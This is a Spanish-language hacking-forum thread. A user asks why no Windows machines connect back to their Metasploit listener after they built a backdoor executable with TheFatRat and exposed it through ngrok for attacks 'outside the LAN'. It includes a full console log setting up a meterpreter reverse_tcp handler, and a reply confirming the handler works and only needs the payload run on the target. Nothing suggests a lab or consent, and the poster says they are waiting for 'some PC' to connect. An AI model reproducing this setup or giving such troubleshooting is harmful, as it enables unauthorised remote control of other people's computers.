Tengo una pregunta: ¿por qué será que los dispositivos claramente que le corren el windows no se conectan a mi dispositivo? Cuando veo un tutorial en pdf a ellos le aparecen los dispositivos que se quieren conectar a su notebook o como sea, pero a mi no me sale. Aqui dejo el codigo que me sale, aun usando TheFatRat que creo el backdoor ejecutable y cuando termino todo me voy a usar el metasploit y no me sale nada, yo he abierto los puertos y utlizo ngrok para darle un ataque fuera de LAN pero me da un error no se si ando viendo tutoriales y libros de versiones anteriores y eso afecte en algo ¿que me recomiendan?
root
@kali (https://underc0de.org/foro/index.php?action=profile;u=42200):~/Escritorio/TheFatRat/output# cd
root
@kali (https://underc0de.org/foro/index.php?action=profile;u=42200):~# msfconsole
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v4.16.15-dev ]
+ -- --=[ 1699 exploits - 968 auxiliary - 299 post ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use multi/handler
msf exploit(handler) > use payload windows/meterpreter/reverse_tcp
[-] Failed to load module: payload
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > sset lhost 192.168.1.103
[-] Unknown command: sset.
msf exploit(handler) > set lhost 192.168.1.103
lhost => 192.168.1.103
msf exploit(handler) > set lport 8080
lport => 8080
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.103 yes The listen address
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > exploit
- Exploit running as background job 0.
- Started reverse TCP handler on 192.168.1.103:8080
root@kali (https://underc0de.org/foro/index.php?action=profile;u=42200):~#[/glow]
Hola @RaineIU.
Según lo que pones has puesto a la escucha el handler esperando que le llegue alguna conexión.
Exploit running as background job 0.
Started reverse TCP handler on 192.168.1.103:8080
No te da ningún error, tan solo te informa de que la operación se esta llevando a cabo en segundo plano.
Solo queda que en maquina se ejecute el payload ya que no estas usando ningún exploit para su ejecución.
Por cierto siempre he escuchado que es mejor usar "run" en vez de "exploit", no tengo ,muy claro por que pero en sus orígenes era así
msf exploit(handler) > exploit
msf exploit(handler) > run
Un saludo.
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
Hola @RaineIU.
Según lo que pones has puesto a la escucha el handler esperando que le llegue alguna conexión.
Exploit running as background job 0.
Started reverse TCP handler on 192.168.1.103:8080
No te da ningún error, tan solo te informa de que la operación se esta llevando a cabo en segundo plano.
Solo queda que en maquina se ejecute el payload ya que no estas usando ningún exploit para su ejecución.
Por cierto siempre he escuchado que es mejor usar "run" en vez de "exploit", no tengo ,muy claro por que pero en sus orígenes era así
msf exploit(handler) > exploit
msf exploit(handler) > run
Un saludo.
Gracias Amigo, me quedó entendido. Usaré run a ver como me va, mientras tendré que esperar que el MetaSploit lance que algún pc se conectó a mi pc :C